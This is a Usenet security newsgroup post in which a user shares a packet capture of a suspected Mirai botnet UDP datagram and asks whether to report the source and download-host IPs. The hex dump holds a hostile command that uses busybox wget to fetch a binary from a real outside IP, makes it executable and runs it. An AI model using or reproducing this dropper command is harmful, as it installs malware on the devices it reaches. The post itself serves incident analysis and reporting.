Rocksolid Light

News from da outaworlds

mail  files  register  groups  login

Message-ID:  

BOFH excuse #200: The monitor needs another box of pixels.


rocksolid / Security / Mirai botnet

SubjectAuthor
o Mirai botnetMarc SCHAEFER

1
Subject: Mirai botnet
From: Marc SCHAEFER
Newsgroups: rocksolid.shared.security
Organization: Posted through news.alphanet.ch
Date: Sat, 4 Feb 2023 16:18 UTC
Path: eternal-september.org!news.eternal-september.org!reader01.eternal-september.org!news.uzoreto.com!news.alphanet.ch!alphanet.ch!.POSTED!not-for-mail
From: schaefer@alphanet.ch (Marc SCHAEFER)
Newsgroups: rocksolid.shared.security
Subject: Mirai botnet
Date: Sat, 4 Feb 2023 16:18:38 -0000 (UTC)
Organization: Posted through news.alphanet.ch
Message-ID: <trm0gu$6n4$1@shakotay.alphanet.ch>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Injection-Date: Sat, 4 Feb 2023 16:18:38 -0000 (UTC)
Injection-Info: shakotay.alphanet.ch; posting-account="schaefer";
logging-data="6884"; mail-complaints-to="usenet@alphanet.ch"; posting-host="634ce6c9682d817d72f6177875e2bb4f.nnrp.alphanet.ch"
User-Agent: tin/2.4.3-20181224 ("Glen Mhor") (UNIX) (Linux/4.19.0-23-amd64 (x86_64))
Cancel-Lock: sha256:RxKuNR2I/4L3LKOGMssdf+vzZHM1pzov4aa/AI4q/gI= sha256:DwVQvCIz1J1Li/Juk6aoJEiTggxSMeUg9/91F4ETSM8=
View all headers

Hello,

is the Mirai botnet still active?

I got a few datagrams like this lately (dest address anonymized)

09:27:22.916608 IP (tos 0x0, ttl 245, id 54321, offset 0, flags [none], proto UDP (17), length 136)
107.189.12.152.47159 > 1.2.3.4.9034: [no cksum] UDP, length 108
0x0000: 4500 0088 d431 0000 f511 0176 6bbd 0c98 E....1.....vk...
0x0010: 0102 0304 b837 234a 0074 0000 6f72 663b .....7#J.t..orf;
0x0020: 6364 202f 746d 703b 2072 6d20 2d72 6620 cd./tmp;.rm.-rf.
0x0030: 6d70 736c 3b20 2f62 696e 2f62 7573 7962 mpsl;./bin/busyb
0x0040: 6f78 2077 6765 7420 6874 7470 3a2f 2f31 ox.wget.http://1
0x0050: 3034 2e32 3434 2e37 322e 382f 6875 616d 04.244.72.8/huam
0x0060: 7073 6c3b 2063 686d 6f64 202b 7820 6875 psl;.chmod.+x.hu
0x0070: 616d 7073 6c3b 202e 2f68 7561 6d70 736c ampsl;../huampsl
0x0080: 206d 7073 6c3b 2023 .mpsl;.#

Shall I assume that:

- 107.189.12.152 is probably spoofed, because UDP, and so I should
not report it?

- 104.224.72.8 should be reported, especially since it really hosts
the URL http://104.224.72.8/huamsl and after manual download, this
is seen as Mirai by an online virus detector ?

Is it the real Mirai, and do you also see attempts like this, or is
it maybe a targetted attack?

--
Attention: limitez le nombre de lignes de citation à l'essentiel, sinon
je ne verrai pas votre réponse. Et si vous écrivez souvent des bobards,
je ne vous lirai plus et je recommanderai (NoCeM) de ne plus vous lire.

1

rocksolid light 0.9.8
clearnet tor